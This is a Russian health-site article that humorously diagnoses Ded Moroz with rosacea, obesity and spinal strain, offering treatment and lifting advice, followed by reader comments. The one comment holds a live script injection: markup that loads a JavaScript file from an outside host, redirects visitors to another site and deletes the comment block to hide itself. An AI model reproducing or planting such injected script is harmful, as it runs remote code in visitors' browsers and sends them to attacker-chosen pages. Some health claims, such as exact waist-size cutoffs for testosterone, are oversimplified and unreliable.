Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Дед Мороз: реальные болез...  >>  Дед Мороз: реальные болезни сказочного героя
 
Обратная связь
 

Дед Мороз: реальные болезни сказочного героя

Размер шрифта
29 февраля 2012 10:00
  • google_analytics: false
  • Нравится

По старой русской традиции, Деда Мороза не отпускают без угощений. А врач не отпустит его в последний день зимы без диагноза и лечения. Чем же болен Дед Мороз?

1 

  1. Красный ноc

Ни чихающего, ни кашляющего Деда Мороза по фольклору мы не помним. А вот прозвище «Красный Нос» есть в каждой сказке. В профессиональной среде такой нос называется розацеа.

Розацеа – усиленный рост кровеносных сосудов на лице. Сосуды не просто расширяются, их становится больше. При такой патологии сосуды разрастаются, и приток крови к носу усиливается. Лицо становится красным, а кожа – бугристой.

1

Раньше с такой болезнью пациент жил всю жизнь. Сегодня розацеа прекрасно лечится лазером. Лазер разогревает кровь в сосуде, и она сворачивается. Сосуд таким образом просто запаивается, и кровь по нему больше не проходит. Процедура проста, безопасна и доступна. Если лечение пока не проведено, скрыть избыточную красноту кожи поможет специальная косметика. Избыточный красный оттенок отлично маскируется зелеными кремами.
 

  1. Объемный живот

Огромный живот говорит об ожирении. Следует помнить, что жир откладывается не только под кожей, но и непосредственно в брюшной полости. Это так называемый висцеральный, внутренний, жир.

Чем опасен висцеральный жир?

1. При накоплении жира вокруг внутренних органов жир выделяет различные вещества, ускоряющие развитие атеросклероза.
2. Висцеральный жир продуцирует гормоны. По объему талии можно судить о балансе гормонов в организме мужчины:
  • окружность талии до 94 см – высокий уровень тестостерона
  • окружность талии от 94 до 102 см – уровень тестостерона заметно снижен
  • окружность талии более 102 – тестостерон значительно снижен

Вот почему чем толще мужчина, тем меньше поводов у него хвастаться своей «мужественностью». С каждым сантиметром в талии у него снижается уровень главного мужского гормона тестостерона.

3. Ожирение так же может способствовать развитию рака.

Что делать?

Лечится ожирение только диетой и физической активностью.
 

  1. Неудобная ноша

По сказкам мы знаем, что мешок Деда Мороза всегда полон подарками. Такой огромный мешок, судя по сказкам, пожилой человек вынужден носить за спиной.

Согбенный дедушка, тянущий огромный мешок на одном плече, безусловно, страдает выраженной формой остеохондроза и сколиоза позвоночника. Возрастные изменения позвоночника усугубляются неправильной переноской тяжестей.

1

Чем опасны такие ноши?

  • выпячиваниями (грыжами) межпозвоночных дисков
  • костными разрастаниями (спондилезом) тел позвонков, изменениями суставов позвоночника (спондилоартроз).
  • тяжелыми болями в спине, в руке и ноге.

Как правильно поднимать тяжести?

  • Равномерно распределяйте вес на обе руки.
  • Поднимайте груз, не нагибаясь к грузу, а присев к нему. Поднимайтесь из этого положения с прямой спиной.
  • Если часто приходится переносить тяжести, используйте мешок-рюкзак с двумя лямками. Рюкзак делает нагрузку на плечевой пояс и позвоночник более равномерной.
  • На близкие расстояния переносить тяжесть лучше тоже с прямой спиной, прижав к груди. Главный принцип – центр тяжести должен находиться как можно ближе к человеку.

 

Cюжеты по теме:
Лечим Дедушку Мороза. 3 реальные болезни сказочного героя

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.